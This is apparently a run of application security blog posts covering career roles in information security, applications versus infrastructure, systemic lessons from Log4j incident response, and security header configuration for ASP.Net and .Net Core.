  • Vulnerability Assessment: running lots of scans, all the time, of everything. You can scan the network too. Ideally, you will do more than this, to assess the security of the systems in your care, but it depends on where you work. This position is often an employee position and you tend to have prolonged relationships with the systems and teams you assess.
  • Vulnerability Management: Keeping Track of the vulnerabilities that all the tools and people find, reporting to management about it, and planning from a higher level. For instance; attempting to wipe out an entire bug class, implementing new tools because you see a deficiency, resource planning, etc. This is an employee position usually, and often a manager role or team lead.
  • Secure Code Reviewer: reading lots of code, using SAST (static application security testing) tools and SCA (Software Composition Analysis — are our 3rd party components secure?), finding vulnerabilities in written code and helping developers fix it.
  • DevSecOps Engineer: an AppSec engineer working in a DevOps environment. Same goal, different tactics. Adding security checks to pipelines, figuring out how to secure containers and anything else your DevOps engineers are up to.
  • Developer Education: this is usually a consultant role, but sometimes for large companies, someone can do this full time. The person teachers the developers to write secure code, the architects to design secure apps, threat modelling, and any other topic they can think of that will help ensure their mandate (secure apps). This person is likely also to training the security champions.
  • Governance: writing policies, guidelines, standards, etc, to ensure your apps are secure. This job is usually someone that does all the governance stuff for your org and the person is working with the AppSec team to get the details right, OR this person is likely a consultant because this is not an activity that needs to be re-done constantly.
  • Incident Response: this area includes jobs as an incident manager (you boss everyone around and make sure the incident goes as smoothly as possible), and investigations (Forensics/DFIR). Investigating incidents related to insecure software is a topic I personally find thrilling; detective work is exciting! But with the stress it causes, it’s not for everyone.
  • Security Testing: often called Penetration Testing, sometimes called Red Teaming, sometimes not officially recognized as a job because management isn’t “ready” to admit they need this yet. This person tests the software (and sometimes networks) to ensure they are secure. This includes manual testing, using lots of tools, and trying to break things without causing a huge mess.
  • Design Review: This is called a “Security Architect” but AppSec folks are often asked to review designs for potential security flaws. If asked, say yes! It’s super fun and always educational. Bonus; it’s a good way to build trust between security and the developers.
  • In AppSec you will also be asked to do a range of other things because that’s how life is. Potential asks; install this giant AppSec tool and figure out how it works, create a proof of concept for an exploit to show everyone that it is/is not a problem, create a proof of value with a new AppSec tool we are considering acquiring, get all the developers to log their apps like ‘so’ in order for the SIEM can read the results, research how to do something securely when you have no idea how to do that thing at all, etc. As I said, it’s super fun!
ISACA Victoria, Dec 2019

Security Architect (apps, cloud, network): Security architects ensure that designs are secure. This can mean reviewing a deployment, network or application design, adding recommendations, or even creating the design themselves from scratch. This tends to be a more senior role.

SOC Analyst/Threat Hunter: SOC analysts interpret output from the monitoring tools to try to tell if something bad is happening, while threat hunters go looking for trouble. This is mostly network-based, and I’m not good at networks, otherwise, I would have been all over this when I moved into security. The idea of threat hunting (using data and patterns to spot problems), is very appealing to my metric-adoring brain.  Note: SOC Analyst is a junior or intermediate position and threat hunter is not a junior position, but if you want to get into InfoSec they are basically always hiring for SOC Analysts, at almost every company.

Risk Analyst: Evaluate systems to identify and measure risk to the business, then offer recommendations on how to mitigate or when to accept the risks. This tends to be coupled closely with Compliance, and Auditing, which I won’t describe here because I am shamefully under-educated in this area.

Security Policy Writer: Writing policies about security, such as how long network passwords need to be, that all public-facing web apps must be available via HTTPS, and that only TLS 1.2 and higher are acceptable on your network. Deciding, writing, socializing and enforcing these policies are all part of this role.

Malware Analyst/Reverse Engineer: Someone needs to look at malware and figure out how it works, and sometimes people need to write exploits (for legitimate reasons, such as to prove that something is indeed vulnerable, or… You need to ask them). If you enjoy puzzles and really low-level programming (such as ARM, assembler, etc), this job might be for you. But be careful; playing with malware at home is dangerous.

Chief Information Security Officer (CISO or CSO): ‘The boss” of security. This person (hopefully) has a seat at the executive table, directs all security aspects for a company, and is the person held responsible, for better or for worse. If you enjoy running programs, managing things from a high level, and making a big difference, this might be a role for you.

Blue Team/Defender/Security Engineer (enterprise security/implements security tools): The people that keep us safe! These people install tools, run the tools, monitor, patch, and freak out when people download and install things to their desktops without asking. They perform security operations, making sure all the things happen. While those in the SOC (Security operations centre), monitor everything that’s happening and respond when there are problems.

There are many, many, many jobs within the field of Information Security, please feel free to list some of the ones that I missed in the comments below. I hope this information helps more of you join our industry because we need all the help we can get!

The Difference Between Applications and Infrastructure

Christian Wiediger on Unsplash

Recently someone asked me what the difference was between Applications and Infrastructure. He asked why a Linux operating system wasn’t “software” and I said it was but it’s a perfect copy… I tend to speak about ‘custom software’. We ended up talking for a very long time about it, and I thought a blog post was in order.

Photo by Christian Wiediger on Unsplash

Infrastructure is the operating systems and hardware that applications live on. Think Windows, Linux, containers, and so much more. Sometimes hardware is included in this category (depending on who you talk to), and sometimes it is not. Infrastructure is necessary to run an application, even serverless runs (briefly) on a container. Operating systems are also all standardized, and not unique in nature. For instance, if I’m running SQL server 2012 R2, and so are you, we both have the same options for patches, configuration, etc. Operating systems are software that speak to hardware. 

Applications are software that speak to operating systems, databases, APIs and anything else you can think of. There are custom applications (what I’m almost always talking about, software developed for a specific business need or as a product to sell), COTS (configurable off the shelf, like sharepoint or confluence, administered by a person or team, installed locally on a server) and regular old software that you install or access via a web browser that you use as-is (no administration required/simpler). More newly there is SaaS, software as a service, which is basically a great big COTS product, hosted by someone else (no need for you to patch or otherwise take care of it, you pick your settings and use it). 

Infrastructure usually needs to be patched, updated/upgraded, and hardened (secure configuration choices). Patches and upgrades arrive in a prepackaged format, but sometimes these updates can break the applications living on that infrastructure. Testing and sometimes downtime is required. This is why so many people say ‘patching is hard’, it is difficult to plan for testing, downtime and to ensure everything will go smoothly. 

Software, on the other hand, includes many different components that will be provided prepackaged (such as a new version of a library or a framework) but when you update them sometimes other libraries or framework parts break and/or the custom code that your team wrote can break as well. Meaning you may need to re-code or rewrite things, or update a whole bunch of things at the same time. I’ve heard developers refer to this as “dependency hell”

If you have just released something brand new, it’s super easy to keep it up to date. Tiny changes present less risk (which is why people love devops over waterfall), making it easier to maintain. But because it’s sparkling and new… Usually management says “hey, please build this new feature, and update that library later”. This is how technical debt accrues. It’s not operational staff or software developers saying ”forget that, I don’t care about this“, it’s almost always conflicting priorities. 

I hope this helps clarify the difference.

Discoveries as a Result of the Log4j Debacle

Me, pre-log4j
Tanya making a silly face.
Happier times, before I knew anything about log4j.

Over the past 2 weeks many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular Log4J java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have upgrading, removing libraries and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.

​Those of you who know me realize I’m going to skip right over anything to do with servers and head right onto the software angle. Forgive me; I know servers are equally important. But they are not my speciality…

Although I already posted in my newsletter, on this blog and my youtube channel , I have more to say. I want to talk about some of the things that I and other incident responders ‘discovered’ as part of investigations for log4j. Things I’ve seen for years, that need to change.

After speaking privately to a few CISOs, AppSec pros and incident responders, there is a LOT going on with this vulnerability, but it’s being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.

Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.

You are amazing. Thank you for your service.

Let’s get into some systemic problems.

Inventory: Not just for Netflix Anymore

I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including Web apps and APIs) is the #1 most important AppSec activity you can do, but people still don’t seem to be listening… Or maybe it’s on their “to do” list? Marked as “for later”? I find it defeating at times that having current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams who I admire. If they find it hard, how can smaller companies with fewer resources get it done? When responding to this incident this problem has never been more obvious.

Look at past me! No idea what was about to hit her, happily celebrating her new glasses.

​Imagine past me, searching repos, not finding log4j and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks I heard of people finding custom code in all SORTS of fun places it was not supposed to be. Such as:

  • Public Repos that should have been private
  • Every type of cloud-based version control or code repo you can think of; GitLab, GitHub, BitBucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
  • On-prem, saved to a file server – some with backups and some without
  • In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
  • SVN, ClearCase, SourceSafe, subversion and other repos I thought no one was using anymore… That are incompatible with the AppSec tools I (and many others) had at hand.

Having it take over a week just to get access to all the various places the code is kept, meant those incident responders couldn’t give accurate answers to management and customers alike. It also meant that some of them were vulnerable, but they had no way of knowing.

Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.

Inventory is valuable for more than just incident response. You can’t be sure your tools have complete coverage if you don’t know you’re assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of fence, because it’s missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don’t know about. Perhaps it gets water damage or starts to rot? It’s the same with applications; they don’t always age well.

We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working folks. This is a systemic problem in our industry.

Lack of Support and Governance for Open-Source Libraries

This may or may not be the biggest issue, but it is certainly the most-talked about throughout this situation. The question posed is most-often is “Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?” and I would argue the answer is “because it works and it’s free”. This is how open-source stuff works. Why not use free stuff? I did it all the time when I was a dev and I’m not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.

Lack of Tooling Coverage

The second problem incident responders walked into was their tools not being able to scan all the things. Let’s say you’re amazing and you have a complete and current inventory (I’m not jealous, YOU’RE JEALOUS), that doesn’t mean your tools can see everything. Maybe there’s a firewall in the way? Maybe the service account for your tool isn’t granted access or has access but the incorrect set of rights? There are dozens are reasons your tool might not have complete coverage. I heard from too many teams that they “couldn’t see” various parts of the network, or their scanning tools weren’t authorized for various repos, etc. It hurts just to think about; it’s so frustrating.

Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **

But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.

Undeployed Code

This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), the project was paused, “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common, it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.

Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, if it’s paused, just an example, is it deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?

Lack of Incident Response/Investigation Training

Many people I spoke to who are part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers, having no idea what we need or want from them during such a crucial moment. When I first started responding to incidents, I was also untrained. I’ve honestly not had near as much training as I would like, with most of what I have learned being from on the job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.

The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening. Multiple people giving quotes to the media, to customers, or other teams. Different status reports that don’t make sense going to management. If you take one thing away from this article it should be that you really need to speak with one voice when the crap hits the fan….

No Shields

For those attempting to protect very old applications (for instance, any apps using log4j 1.X versions), you should consider getting a shield for your application. And by “shield” I mean put it behind a CDN (Content Delivery network) like CloudFlare, behind a WAF (Web Application Firewall) or a RASP (Run-Time Application Security Protection).

Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.

Ancient Dependencies

Several teams I advised had what I would call “Ancient Dependencies”; dependencies so old that the application would requiring re-architecting in order to upgrade them. I don’t have a solution for this, but it is part of why Log4J is going to take a very, very long time to square away.

Technical debt is security debt.

– Me

Solutions Needed

I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.

Security Headers for ASP.Net and .Net CORE

Website report showing we received an A

For those who do not follow myself or Franziska Bühler, we have an open source project together called OWASP DevSlop in which we explore DevSecOps through writing vulnerable apps, creating pipelines, publishing proof of concepts, and documenting what we’ve learned on our YouTube Channel and our blogs. In this article we will explore adding security headers to our proof of concept website, DevSlop.co. This blog post is closely related to Franziska’s post OWASP DevSlop’s journey to TLS and Security Headers. If you like this one, read hers too. 🙂

Franziska Bühler and I installed several security headers during the OWASP DevSlop Show in Episode 22.1 and 2.2. Unfortunately we found out that .Net Core apps don’t have a web.config, so the next time we published it wiped out the beautiful headers we had added. Although that is not good news, it was another chance to learn, and it gave me great excuse to finally write my Security Headers blog post that I have been promising. Here we go!

Our web.config looked so…. Empty.

Just now, I added back the headers but I added them to the startup.cs file in my .Net Core app, which you can watch here. Special thanks to Damien Bod for help with the .Net Core twist.

If you want in-depth details about what we did on the show and what each security header means, you should read Franziska’s blog post. She explains every step, and if you are trying to add security headers for the first time to your web.config (ASP.Net, not .Net CORE), you should definitely read it.

The new code for ASP.Net in your web.config looks like this:

<! — Start Security Headers →
<httpProtocol>
<customHeaders>
<add name=”X-XSS-Protection” value=”1; mode=block”/>
<add name=”Content-Security-Policy” value=”default-src ‘self’”/>
<add name=”X-frame-options” value=”SAMEORIGIN”/>
<add name=”X-Content-Type-Options” value=”nosniff”/>
<add name=”Referrer-Policy” value=”strict-origin-when-cross-origin”/>
<remove name=”X-Powered-By”/>
</customHeaders>
</httpProtocol>
<! — End Security Headers →

Our new-and-improved Web.Config!

And the new code for my startup.cs (.Net CORE), looks like this (Thank you Damien Bod):

//Security headers make me happy
app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());
app.UseXContentTypeOptions();
app.UseReferrerPolicy(opts => opts.NoReferrer());
app.UseXXssProtection(options => options.EnabledWithBlockMode());
app.UseXfo(options => options.Deny());

app.UseCsp(opts => opts
.BlockAllMixedContent()
.StyleSources(s => s.Self())
.StyleSources(s => s.UnsafeInline())
.FontSources(s => s.Self())
.FormActions(s => s.Self())
.FrameAncestors(s => s.Self())
.ImageSources(s => s.Self())
.ScriptSources(s => s.Self())
);
//End Security Headers

Our beautiful security headers!

In future episodes we will also add:

  • Secure settings for our cookies
  • X-Permitted-Cross-Domain-Policies: none
  • Expect-CT: (not currently supported by our provider)
  • Feature-Policy: camera ‘none’; microphone ‘none’; speaker ‘self’; vibrate ‘none’; geolocation ‘none’; accelerometer ‘none’; ambient-light-sensor ‘none’; autoplay ‘none’; encrypted-media ‘none’; gyroscope ‘none’; magnetometer ‘none’; midi ‘none’; payment ‘none’; picture-in-picture ‘none’; usb ‘none’; vr ‘none’; fullscreen *;

For more information on all of these security headers, I strongly suggest you read the OWASP Security Headers Guidance.

We now have good marks from all of the important places, https://securityheaders.comhttps://www.ssllabs.com and http://hardenize.com, but hope to improve our score even further.

For more information, watch our show! Every Sunday from 1–2 pm EDT, on Mixer and Twitch, and recordings are available later on our YouTube channel.

Please use every security header that is available and applicable to you.

For content like this and more, check out my book, Alice and Bob Learn Application Security and my online community, We Hack Purple!